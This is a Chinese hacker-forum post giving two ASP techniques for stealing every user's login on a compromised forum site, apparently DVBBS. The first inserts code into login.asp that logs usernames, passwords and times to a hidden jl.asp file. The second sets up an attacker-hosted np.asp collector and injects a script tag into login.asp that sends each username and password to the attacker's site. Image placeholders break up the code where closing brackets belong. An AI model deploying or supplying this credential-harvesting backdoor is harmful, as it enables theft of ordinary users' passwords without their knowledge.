蓝屏--记录密码绝招!!!
来自:冰点极限论坛
方法一:login.asp中Case "chk"下: (主要针对动网)
on error resume next
dim lp
set lP=server.CreateObject("Adodb.Stream"
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lp.LoadFromFile server.mapPath("jl.asp"
lp.Position=lp.Size
lP.writetext now&request("username"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&"text:"&request("password"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&chr(10)
lP.SaveToFile server.mapPath("jl.asp"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
,2
lP.Close
set lP=nothing
全部登陆人的密码;时间和名字.至于admin_index.asp你看着加吧
方法二:如果你有自己的网站:
建立目录np;在里面建立一个空的jl.asp和如下代码的np.asp:
<%@codepage=936%><%Response.Expires=0
if request("k"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
="k" then%>
<pre><!--#include file="jl.asp"-->
<%elseif request("n"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
<>"" and request("p"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
<>"" then
on error resume next
dim lp
set lP=server.CreateObject("Adodb.Stream"
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lp.LoadFromFile server.mapPath("jl.asp"
zh=lp.readtext(6152192)&"<"&"%if isempty(request(""k""
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
) then response.redirect ""np.asp""%"&">"
lp.Position=0
lP.writetext now&"有大侠以名 "&request("n"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&" 及密码 "&request("p"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&"]"&chr(13)&chr(10)&zh
lP.SaveToFile server.mapPath("jl.asp"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
,2
lP.Close
set lP=nothing
end if%>
在login.asp那里插入一句:
response.write "<SCRIPT src=http://你网站/np/np.asp?n="&request("username"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&"&"&p="&request("password"
data:image/s3,"s3://crabby-images/f3cc5/f3cc5dd8b09775feb21c504c9955609a31d60d3a" alt=""
&"></SCRIPT>"
--------所有登陆人都会乖乖的把名字和密码送到你的jl.asp 里